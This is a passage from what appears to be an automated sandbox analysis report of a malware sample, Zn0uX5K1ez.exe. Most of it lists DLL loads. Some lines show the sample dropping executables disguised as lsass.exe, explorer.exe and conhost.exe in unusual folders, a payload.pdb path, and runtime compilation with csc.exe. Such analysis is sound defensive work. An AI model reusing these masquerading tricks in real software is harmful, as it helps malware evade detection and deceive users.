                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ktmw32.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: rasman.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: winnsi.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: rasadhlp.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: wbemcomn.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: amsi.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: userenv.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: edputil.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: winmm.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: winmmbase.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: mmdevapi.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: devobj.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ksuser.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: avrt.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: dwrite.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: audioses.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: powrprof.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: umpdc.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: msacm32.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: midimap.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: windowscodecs.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ntmarta.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: version.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: wldp.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: profapi.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: version.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: version.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: wldp.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: profapi.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: sspicli.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: mscoree.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: kernel.appcore.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: version.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: uxtheme.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: windows.storage.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: wldp.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: profapi.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: cryptsp.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: rsaenh.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: cryptbase.dll
                                    Source: C:\blockhostnet\msinto.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: version.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: wldp.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: profapi.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\appcompat\hPeZTHbzcsUskSflSyozwAqUA.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: version.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\lsass.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: version.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: version.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: wldp.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: profapi.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\debug\explorer.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Users\user\Desktop\Zn0uX5K1ez.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: Zn0uX5K1ez.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                                    Source: Zn0uX5K1ez.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                                    Source: Zn0uX5K1ez.exeStatic file information: File size 8034816 > 1048576
                                    Source: Zn0uX5K1ez.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x79c400
                                    Source: Zn0uX5K1ez.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Source: Zn0uX5K1ez.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: svchost.exe, 00000002.00000003.2104402669.0000000006800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000000.2102681512.0000000000863000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp, Zn0uX5K1ez.exe, svchost.exe.0.dr
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.pdb source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: :C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.pdb source: msinto.exe, 0000000A.00000002.2389367064.0000000003795000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:\Users\User\Desktop\payload\obj\Debug\payload.pdb source: Zn0uX5K1ez.exe
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bpgiaqs4\bpgiaqs4.cmdline"Jump to behavior
                                    Source: C:\blockhostnet\msinto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tcgkwiyn\tcgkwiyn.cmdline"Jump to behavior
                                    Source: initial sampleStatic PE information: section where entry point is pointing to: .SnO
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeFile created: C:\blockhostnet\__tmp_rar_sfx_access_check_5261625Jump to behavior
                                    Source: svchost.exe.0.drStatic PE information: section name: .didat
                                    Source: explorer.exe.0.drStatic PE information: section name: .'|?
                                    Source: explorer.exe.0.drStatic PE information: section name: .h>&
                                    Source: explorer.exe.0.drStatic PE information: section name: .SnO
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084F640 push ecx; ret 2_2_0084F653
                                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 2_2_0084EB78 push eax; ret 2_2_0084EB96
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD348A474F pushad ; iretd 10_2_00007FFD348A4755
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD348A4BAC push es; retf 10_2_00007FFD348A4BAF
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD34C9E64E push edx; ret 10_2_00007FFD34C9E652
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD34C9EDC0 push ecx; ret 10_2_00007FFD34C9EDC1
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD34C9E74C push ecx; ret 10_2_00007FFD34C9E750
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD34C9E2BB push es; retf 10_2_00007FFD34C9E2BF
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD34C9E6C4 push esi; ret 10_2_00007FFD34C9E6C5
                                    Source: C:\blockhostnet\msinto.exeCode function: 10_2_00007FFD34C92825 push E8FFFFFFh; retf 10_2_00007FFD34C92831
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348C1DD6 push ds; iretd 21_2_00007FFD348C1DD7
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348B474F pushad ; iretd 21_2_00007FFD348B4755
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348B4BAC push es; retf 21_2_00007FFD348B4BAF
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348E7DF5 pushad ; iretd 21_2_00007FFD348E7E1D
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD348D6CD2 pushfd ; iretd 21_2_00007FFD348D6CE1
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE135 push edi; ret 21_2_00007FFD34CAE136
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE861 push esp; ret 21_2_00007FFD34CAE862
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE634 push edi; ret 21_2_00007FFD34CAE635
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE655 push edx; ret 21_2_00007FFD34CAE659
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE1FB push ebp; ret 21_2_00007FFD34CAE20B
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE1DB push edi; ret 21_2_00007FFD34CAE1DC
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAED6E push eax; ret 21_2_00007FFD34CAED77
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE560 push edi; ret 21_2_00007FFD34CAE561
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE999 push ebx; ret 21_2_00007FFD34CAE9A6
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeCode function: 21_2_00007FFD34CAE2B7 push ebp; ret 21_2_00007FFD34CAE2C7
